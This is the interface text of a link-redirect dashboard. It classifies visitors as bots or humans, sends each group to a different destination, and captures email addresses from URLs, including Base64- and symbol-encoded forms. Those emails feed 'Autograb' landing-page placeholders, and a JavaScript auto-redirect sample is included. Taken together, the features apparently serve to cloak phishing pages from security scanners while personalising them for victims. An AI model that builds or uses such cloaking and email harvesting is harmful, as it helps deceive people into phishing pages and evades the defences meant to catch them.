Redirect Dashboard
Bot Detection & Email CaptureAPI Key
Enter your API key from the external bot classification service
Your Domains
Add your own domains for unlimited redirect links (no daily limits)
| Domain | Owner | Daily Limit | Added | Actions |
|---|---|---|---|---|
| Loading domains... | ||||
Create Redirect Link
Select a domain and set destination URLs for humans and bots
Loading...
Generated URL
Generate a URL above to see the result
Your Redirect Links
| Redirect Link & Destinations | Total Clicks | Unique Clicks | Created | Actions |
|---|---|---|---|---|
| No redirect links yet | ||||
Create Custom Landing Page
📚 Autograb Placeholder Guide
Your custom landing page can automatically use visitor data with these placeholders:
{{EMAIL}} - Visitor's Email Address
Automatically replaced with the email captured from the URL.
<p>Welcome, {{EMAIL}}!</p>
{{HUMAN_URL}} - Destination URL
Replaced with the human destination URL you set when creating the redirect link.
<a href="{{HUMAN_URL}}">Click here to continue</a>
⏱️ Auto-Redirect Example
Automatically redirect visitors after a delay (e.g., 3 seconds):
<script>
setTimeout(() => {
window.location.href = '{{HUMAN_URL}}';
}, 3000);
</script>
Your Custom Landing Pages
| Name | Created | Actions |
|---|---|---|
| No custom landing pages yet. Create one above! | ||
Email URL Generator
Generate a complete URL with email for any format. The tool handles proper encoding automatically.
Supported Email Formats
✅ HUMAN: Emails captured & forwarded
❌ BOT: Emails NOT captured & stripped
1. Standard Query (Recommended):
?email=user@example.com
2. Dollar Separator (URL-encoded):
%24user%40example.com
3. Asterisk Separator (URL-encoded):
%2Auser%40example.com
4. Base64 Encoded:
%24dGVzdEB0ZXN0LmNvbQ==
⚠️ Important: For $ and * formats, use the Email URL Generator above. Raw $ and @ in URLs cause browser issues. The generator creates properly encoded URLs.